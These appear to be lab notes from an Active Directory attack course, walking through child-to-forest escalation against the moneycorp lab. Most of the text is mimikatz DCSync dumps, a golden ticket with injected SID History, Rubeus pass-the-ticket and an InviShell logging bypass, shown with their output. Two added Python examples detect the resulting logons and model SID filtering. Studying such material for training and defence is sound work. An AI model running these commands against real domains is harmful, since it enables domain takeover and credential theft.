## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local

[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:46:24 PM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID : 502

Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
lm - 0: 87836055143ad5a507de2aaeb9000361

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7c7a5135513110d108390ee6c322423f

* Primary:Kerberos-Newer-Keys *
Default Salt : MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
aes128_hmac (4096) : 801bb69b81ef9283f280b97383288442
des_cbc_md5 (4096) : c20dc80d51f7abd9

* Primary:Kerberos *
Default Salt : MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : c20dc80d51f7abd9

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 49fec950691bbeba1b0d33d5a48d0293
02 0b0c4dbc527ee3154877e070d043cd0d
03 987346e7f810d2b616da385b0c2549ec
04 49fec950691bbeba1b0d33d5a48d0293
05 0b0c4dbc527ee3154877e070d043cd0d
06 333eda93ecfba8d60c57be7f59b14c62
07 49fec950691bbeba1b0d33d5a48d0293
08 cdf2b153a374773dc94ee74d14610428
09 cdf2b153a374773dc94ee74d14610428
10 a6687f8a2a0a6dfd7c054d63c0568e61
11 3cf736e35d2a54f1b0c3345005d3f962
12 cdf2b153a374773dc94ee74d14610428
13 50f935f7e1b88f89fba60ed23c8d115c
14 3cf736e35d2a54f1b0c3345005d3f962
15 06c616b2109569ddd69c8fc00c6a413c
16 06c616b2109569ddd69c8fc00c6a413c
17 179b9c2fd5a34cbb6013df534bf05726
18 5f217f838649436f34bbf13ccb127f44
19 3564c9de46ad690b83268cde43c21854
20 1caa9da91c85a1e176fb85cdefc57587
21 27b7de3c5a16e7629659152656022831
22 27b7de3c5a16e7629659152656022831
23 65f5f95db76e43bd6c4ad216b7577604
24 026c59a45699b631621233cb38733174
25 026c59a45699b631621233cb38733174
26 342a52ec1d3b39d90af55460bcda72e8
27 ef1e1a688748f79d16e8e32318f51465
28 9e93ee8e0bcccb1451face3dba22cc69
29 480da975c1dfc76717a63edc6bb29d7b

mimikatz(commandline) # exit
Bye!

This attack is very noisy: it generates events 4624, 4634 and 4672. Event ID 4672 (special privileges assigned to new logon) for a domain administrator of a child domain on the domain controller of the parent domain is not normal, so this attack is identified very easily.
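
As an added defender-side example written for these notes (not code from the original lab or from any tool used here), the following Python flags the 4672 pattern just described over a few constructed event lines. The flattened Key=Value event format, the NetBIOS-to-DNS table and the exclusion of machine accounts are assumptions of the example; in production the events would come from the DC's Security log and the domain table from the forest's trusted-domain list.

```python
import re

# Constructed NetBIOS -> DNS mapping for the lab forest on this page (an assumption
# of the example; derive it from the forest's trusted-domain list in production).
NETBIOS_TO_DNS = {
    "MCORP": "moneycorp.local",
    "MONEYCORP": "moneycorp.local",
    "DCORP": "dollarcorp.moneycorp.local",
    "DOLLARCORP": "dollarcorp.moneycorp.local",
}

# Constructed sample events in a flattened Key=Value form (not a real EVTX export).
SAMPLE_EVENTS = [
    "EventID=4672 Computer=mcorp-dc.moneycorp.local SubjectDomainName=MONEYCORP SubjectUserName=Administrator Privileges=SeDebugPrivilege",
    "EventID=4624 Computer=mcorp-dc.moneycorp.local SubjectDomainName=dcorp SubjectUserName=Administrator LogonType=3",
    "EventID=4672 Computer=mcorp-dc.moneycorp.local SubjectDomainName=dcorp SubjectUserName=Administrator Privileges=SeDebugPrivilege",
    "EventID=4672 Computer=mcorp-dc.moneycorp.local SubjectDomainName=dcorp SubjectUserName=DCORP-DC$ Privileges=SeEnableDelegationPrivilege",
    "EventID=4672 Computer=mcorp-dc.moneycorp.local SubjectDomainName=NT AUTHORITY SubjectUserName=SYSTEM Privileges=SeTcbPrivilege",
]


def parse_event(line):
    """Parse 'Key=Value Key=Value ...' into a dict; values may contain spaces."""
    return dict(re.findall(r"(\w+)=(.*?)(?=\s\w+=|$)", line))


def host_domain(fqdn):
    """DNS domain of the logging host: mcorp-dc.moneycorp.local -> moneycorp.local."""
    return fqdn.split(".", 1)[1].lower() if "." in fqdn else fqdn.lower()


def find_cross_domain_privileged_logons(lines, netbios_to_dns=NETBIOS_TO_DNS):
    """Return the 4672 events whose subject is a user account from a domain other
    than the one the logging DC belongs to (e.g. dcorp\\Administrator on MCORP-DC)."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4672":
            continue
        user = ev.get("SubjectUserName", "")
        if user.endswith("$"):
            # Computer and DC accounts from other domains of the forest log on with
            # special privileges for replication; baseline them separately.
            continue
        acct_dns = netbios_to_dns.get(ev.get("SubjectDomainName", "").upper())
        if acct_dns is None:
            continue  # local or well-known principals such as NT AUTHORITY\SYSTEM
        if acct_dns != host_domain(ev.get("Computer", "")):
            findings.append({
                "computer": ev["Computer"],
                "account": f"{ev['SubjectDomainName']}\\{user}",
                "privileges": ev.get("Privileges", ""),
            })
    return findings


if __name__ == "__main__":
    for f in find_cross_domain_privileged_logons(SAMPLE_EVENTS):
        print(f"ALERT cross-domain privileged logon on {f['computer']}: "
              f"{f['account']} ({f['privileges']})")
```

Run against the constructed events, only the dcorp\Administrator logon on mcorp-dc is reported; the root-domain administrator, the 4624 event, the DCORP-DC$ machine account and NT AUTHORITY\SYSTEM are all passed over. Correlating the hit with the matching 4624 (same LogonId) gives the source address of the session.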

Instead of accessing the forest DC as an administrator of the child domain, we access the forest DC as a domain controller. For this we inject the Domain Controllers (RID 516) and Enterprise Domain Controllers (S-1-5-9) SIDs into the SID History and then run the DCSync attack against the forest domain controller.
C:\Windows\system32>C:\AD\Tools\old_tools\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-516,S-1-5-9
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /ptt" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-
516,S-1-5-9 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /ptt
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-516 ; S-1-5-9 ;
ServiceKey: 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 - aes256_hmac
Lifetime : 7/4/2024 11:08:10 AM ; 7/2/2034 11:08:10 AM ; 7/2/2034 11:08:10 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

C:\Windows\system32>klist

Current LogonId is 0:0x16159e5

Cached Tickets: (1)

#0> Client: Administrator @ dollarcorp.moneycorp.local
Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 7/4/2024 11:08:10 (local)
End Time: 7/2/2034 11:08:10 (local)
Renew Time: 7/2/2034 11:08:10 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

C:\Windows\system32>"C:\AD\Tools\Old_Tools\SafetyKatz.exe" "lsadump::dcsync /user:mcorp\krbtgt
/domain:moneycorp.local" "exit"

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local

[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:46:24 PM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID : 502

Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
lm - 0: 87836055143ad5a507de2aaeb9000361

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7c7a5135513110d108390ee6c322423f

* Primary:Kerberos-Newer-Keys *
Default Salt : MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
aes128_hmac (4096) : 801bb69b81ef9283f280b97383288442
des_cbc_md5 (4096) : c20dc80d51f7abd9

* Primary:Kerberos *
Default Salt : MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : c20dc80d51f7abd9

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 49fec950691bbeba1b0d33d5a48d0293
02 0b0c4dbc527ee3154877e070d043cd0d
03 987346e7f810d2b616da385b0c2549ec
04 49fec950691bbeba1b0d33d5a48d0293
05 0b0c4dbc527ee3154877e070d043cd0d
06 333eda93ecfba8d60c57be7f59b14c62
07 49fec950691bbeba1b0d33d5a48d0293
08 cdf2b153a374773dc94ee74d14610428
09 cdf2b153a374773dc94ee74d14610428
10 a6687f8a2a0a6dfd7c054d63c0568e61
11 3cf736e35d2a54f1b0c3345005d3f962
12 cdf2b153a374773dc94ee74d14610428
13 50f935f7e1b88f89fba60ed23c8d115c
14 3cf736e35d2a54f1b0c3345005d3f962
15 06c616b2109569ddd69c8fc00c6a413c
16 06c616b2109569ddd69c8fc00c6a413c
17 179b9c2fd5a34cbb6013df534bf05726
18 5f217f838649436f34bbf13ccb127f44
19 3564c9de46ad690b83268cde43c21854
20 1caa9da91c85a1e176fb85cdefc57587
21 27b7de3c5a16e7629659152656022831
22 27b7de3c5a16e7629659152656022831
23 65f5f95db76e43bd6c4ad216b7577604
24 026c59a45699b631621233cb38733174
25 026c59a45699b631621233cb38733174
26 342a52ec1d3b39d90af55460bcda72e8
27 ef1e1a688748f79d16e8e32318f51465
28 9e93ee8e0bcccb1451face3dba22cc69
29 480da975c1dfc76717a63edc6bb29d7b

mimikatz(commandline) # exit
Bye!

Cross Forest attacks

Getting the RC4 or AES hash of the trust key

Across forests where a trust is established, escalation from Enterprise Admins of one forest to Enterprise Admins of another forest is not possible, because SID filtering removes all foreign SIDs from the user's access token when a resource is accessed via a trust in the trusting domain. Only the resources in a forest that are explicitly shared with the other forest are accessible.
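
To make the contrast with the child-to-parent escalation above concrete, here is an added example (written for these notes, not code from the lab or from any Windows component) that models SID filtering on a forest trust against the unfiltered parent/child trust. The moneycorp.local and dollarcorp.moneycorp.local domain SIDs are the ones shown on this page; the other forest's root SID is a constructed placeholder. The model keeps only the core rule (a domain SID survives a forest trust only if its domain belongs to the trusted forest, and well-known SIDs such as S-1-5-9 never do); the real KDC applies further rules from MS-PAC section 4.1.2.2.

```python
# Domain SIDs taken from this page; the third one is a constructed placeholder.
MCORP_SID = "S-1-5-21-335606122-960912869-3279953914"   # moneycorp.local (forest root)
DCORP_SID = "S-1-5-21-719815819-3726368948-3917688648"  # dollarcorp.moneycorp.local (child)
OTHER_FOREST_SID = "S-1-5-21-111111111-222222222-333333333"  # placeholder: root of another forest
ENTERPRISE_DCS = "S-1-5-9"  # well-known Enterprise Domain Controllers SID


def domain_prefix(sid):
    """Return the domain part of a S-1-5-21-<a>-<b>-<c>-<rid> SID, or None for
    non-domain (well-known) SIDs such as S-1-5-9."""
    parts = sid.split("-")
    if sid.startswith("S-1-5-21-") and len(parts) == 8:
        return "-".join(parts[:7])
    return None


def filter_sids(pac_sids, trust_type, trusted_forest_domains):
    """Simplified SID filtering. Returns (kept, dropped).

    trust_type: 'parent_child' (intra-forest) or 'forest' (inter-forest).
    trusted_forest_domains: domain SIDs the trusting forest knows belong to the
    trusted forest (the forest trust info), only used for 'forest'.
    """
    if trust_type == "parent_child":
        # Intra-forest trusts do not apply SID filtering by default, which is why
        # SID History injected in the child (519, 516, S-1-5-9 above) is honoured
        # by the parent; netdom trust ... /quarantine:Yes would switch it on.
        return list(pac_sids), []
    if trust_type != "forest":
        raise ValueError(f"unknown trust type {trust_type!r}")
    kept, dropped = [], []
    for sid in pac_sids:
        prefix = domain_prefix(sid)
        if prefix is not None and prefix in trusted_forest_domains:
            kept.append(sid)
        else:
            dropped.append(sid)  # foreign-forest domain SIDs and well-known SIDs
    return kept, dropped


# PAC of dollarcorp\Administrator with the SID History injected on this page, plus
# the other forest's Enterprise Admins SID to show that it can never survive.
INJECTED_PAC = [
    DCORP_SID + "-500",         # the user itself
    DCORP_SID + "-512",         # Domain Admins of dollarcorp
    MCORP_SID + "-519",         # Enterprise Admins of moneycorp (injected)
    MCORP_SID + "-516",         # Domain Controllers of moneycorp (injected)
    ENTERPRISE_DCS,             # Enterprise Domain Controllers (injected)
    OTHER_FOREST_SID + "-519",  # Enterprise Admins of the other forest (injected)
]


def demo():
    # 1) child -> parent inside moneycorp's own forest: nothing is removed.
    kept_intra, dropped_intra = filter_sids(INJECTED_PAC, "parent_child", set())
    # 2) moneycorp's forest -> another forest over a forest trust: the other
    #    forest only admits SIDs from domains it knows belong to moneycorp's forest.
    kept_cross, dropped_cross = filter_sids(
        INJECTED_PAC, "forest", {MCORP_SID, DCORP_SID})
    return kept_intra, dropped_intra, kept_cross, dropped_cross


if __name__ == "__main__":
    kept_intra, _, kept_cross, dropped_cross = demo()
    print("parent/child trust keeps :", kept_intra)
    print("forest trust keeps       :", kept_cross)
    print("forest trust drops       :", dropped_cross)
```

Across the forest trust, moneycorp's own Enterprise Admins SID does survive, but in the other forest it is merely a foreign SID with no built-in rights; it grants access only where an ACL in that forest explicitly names it, which is the "explicitly shared" case the paragraph describes. The other forest's Enterprise Admins SID and S-1-5-9 are discarded, so the escalation does not carry over.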

DCSync attack

To obtain the inter-realm trust key, we can run a DCSync attack, which requires domain administrator privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : GI5URSM1
[*] Domain : 00IB0KZR
[*] Password : K6M9JFXY
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5020
[+] LUID : 0x1cc4e7d

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 30166653
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x1cc4e7d
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/5/2024 12:41:16 AM
EndTime : 7/5/2024 10:41:16 AM
RenewTill : 7/12/2024 12:41:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : uApDHIoeSKcmXWUxxXVV/v2M4lPf/4uoK0JzLKaPZmc=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt with Domain Administrator privileges opens. We can now run the DCSync attack to get the inter-realm trust key.
C:\Windows\system32>"C:\AD\Tools\Old_tools\BetterSafetyKatz.exe" "lsadump::dcsync
/user:dcorp\ecorp$" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:dcorp\ecorp$

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\ecorp$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : ecorp$

** SAM ACCOUNT **

SAM Username : ecorp$
Account Type : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Account expiration :
Password last change : 7/4/2024 10:15:46 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-1112
Object Relative ID : 1112

Credentials:
Hash NTLM: feddedccad840cd0e5c912cb1f860b35
ntlm- 0: feddedccad840cd0e5c912cb1f860b35
ntlm- 1: 10b5b23f42f792c66e2277be14f4b55d
ntlm- 2: 7c36fa5f301d69efdbb07a1edf33c9df
ntlm- 3: ea80e49d365a24a147fcd1d6dc318fc0
ntlm- 4: 11c187ac7018a9beeb860c1cca54af06
ntlm- 5: 11c187ac7018a9beeb860c1cca54af06
ntlm- 6: e5bafd881e8e5d134e6c0994b4c25e86
ntlm- 7: 16f488bc4a807949cac214e2133fc2a7
ntlm- 8: 0e5dab89f76c6eee55bd4bb21c4d2c77
ntlm- 9: 629dc2d91bf1a947ac8bf549d11af2ef
ntlm-10: 629dc2d91bf1a947ac8bf549d11af2ef
ntlm-11: c385a63faf99a3683122c2a6cc1cdfca
ntlm-12: dda7fb5024ebd1559a54acd4f5a8a45e
ntlm-13: 660bc35992fd46489936d726a566ceaf
ntlm-14: f7656959be8e6a194a4328b87333fc10
ntlm-15: f7656959be8e6a194a4328b87333fc10
ntlm-16: b70359171eaba09b47b6628a96acd306
ntlm-17: b70359171eaba09b47b6628a96acd306
ntlm-18: b70359171eaba09b47b6628a96acd306
ntlm-19: e57174660d873322518eb638a7de1dc4
ntlm-20: 2e4c4f5f8430d2a911423e2a0ab1e638
ntlm-21: 2e4c4f5f8430d2a911423e2a0ab1e638
ntlm-22: 06a8dd8fce6bbff42f447692bfed66bc
ntlm-23: 8de42d81c52e69a4428aef2efdc7e21a
lm - 0: 790b0c87d488bc61ab0e1d4ea905c809
lm - 1: 63c6d76e01ce59a29a0c9ae0ec53cda3
lm - 2: 5a4bb9c62af1697cc8444e9f89c9de4c
lm - 3: 7499250d8c717e07f6c7dd0bcbc71e1b
lm - 4: db67c4fdcf62e08175512e4807bddd76
lm - 5: 057969b2ad1f70f45dc5a12e6f8b3cd6
lm - 6: ef45c06f41dce1cc69e6e829efa9329e
lm - 7: ea657e094e8f42b45c2a5e998485df9a
lm - 8: e12cc1998cbec556ebb3b43787352a3b
lm - 9: 0923ecd0651846f3ec22bc0bd89adfa1
lm -10: 5e11fe0aead285010c8e958c458473d8
lm -11: 7f9b2b0268231129cd2af20cd04d8324
lm -12: fee2907cec424667a075f09208e5665c
lm -13: cd147ebeceee38114a801b57ea8a3850
lm -14: cbd7ef426f508b6c364d5c963015de79
lm -15: f3caa3b36790c65eaee5d113165f3014
lm -16: d045cbb01832ea70efe0b707bf730ed2
lm -17: 782161a13017c66c8ad939588e837316
lm -18: 18321a190a2f0da7173ff74a2d257201
lm -19: 95bdf4eebd05a793c16aba601e6380d7
lm -20: f59a0a245f5d91de4d8e04341a5c3e27
lm -21: 06fe224d178befa31042256de47acd5d
lm -22: 612d262ebcba540762f15adcb90eabeb
lm -23: 31835d3cadd55bd20b38e2e6f7ebd0d6

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtecorp
Default Iterations : 4096
Credentials
aes256_hmac (4096) : e67aa9981db12e7e0dd8165a422b2009017f6c870b9b9f96b9e8105b82126b37
aes128_hmac (4096) : f69f70cbcc4501fc0abba42373c028c0
des_cbc_md5 (4096) : 3d917aa7cd2c3894
OldCredentials
aes256_hmac (4096) : 65cc8526de20b5d4234e4e9ed804de796fff3bb4c97b8203a88dce54194ae72e
aes128_hmac (4096) : da1a9669b38da36b85bada8443abf68d
des_cbc_md5 (4096) : 3d917aa7cd2c3894
OlderCredentials
aes256_hmac (4096) : bd60f2bf83382da26db5853b1478633097cab3cd5f0664e96265c321dc6fe1a7
aes128_hmac (4096) : ff5486c7084846aaf1162e9f5b8309d4
des_cbc_md5 (4096) : 3d917aa7cd2c3894

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtecorp
Credentials
des_cbc_md5 : 3d917aa7cd2c3894
OldCredentials
des_cbc_md5 : 3d917aa7cd2c3894

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 c569d2848a566d18f74628891d927c97
02 cf67c08a2f143b09a3acfd8d63ee96cb
03 93d251c47edf12d5a6a21466270885d2
04 c569d2848a566d18f74628891d927c97
05 cf67c08a2f143b09a3acfd8d63ee96cb
06 451993486426f0cdf6800c610e356767
07 c569d2848a566d18f74628891d927c97
08 cd61215b6a1f99f9e95695a7cacee403
09 cd61215b6a1f99f9e95695a7cacee403
10 d8cec349aa9e57497825d81551decfda
11 aa57224de64e923acf6bdbb0b61af3dd
12 cd61215b6a1f99f9e95695a7cacee403
13 5e74ef0c5f032f26aa3b246415c9ca04
14 aa57224de64e923acf6bdbb0b61af3dd
15 1effaeb40dc0885b0ff45c3ea0c74035
16 1effaeb40dc0885b0ff45c3ea0c74035
17 6fb27f85c2e7e6ba0cc33749ec9dd68f
18 d1af13370003757866d45667874907e8
19 daf4b486a0d5cc756bc0cd7d91263e22
20 5e4c53291970854ae29da588da0e3981
21 7ef0be01ad83a12b1b94ce2bdad1bebf
22 7ef0be01ad83a12b1b94ce2bdad1bebf
23 a7101a39bbda962156013bb4761bdef7
24 1699d73ac432b2724f3798465ebdc101
25 1699d73ac432b2724f3798465ebdc101
26 aac15ecee7a8493f2f2bb78fcb2bafe8
27 fe7533dadc475eef83058e77db33c755
28 56ae9f95ce77a6e62e78b201a308fe56
29 342cf49efa873980d47e59bfbb8f3ed4

mimikatz(commandline) # exit
Bye!

Invoke-Mimi
We can also get the Inter-Realm trust key using Invoke-Mimi.

lsadump::trust /patch
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ScriptBlock { $env:username;$env:computername }
svcadmin
DCORP-DC
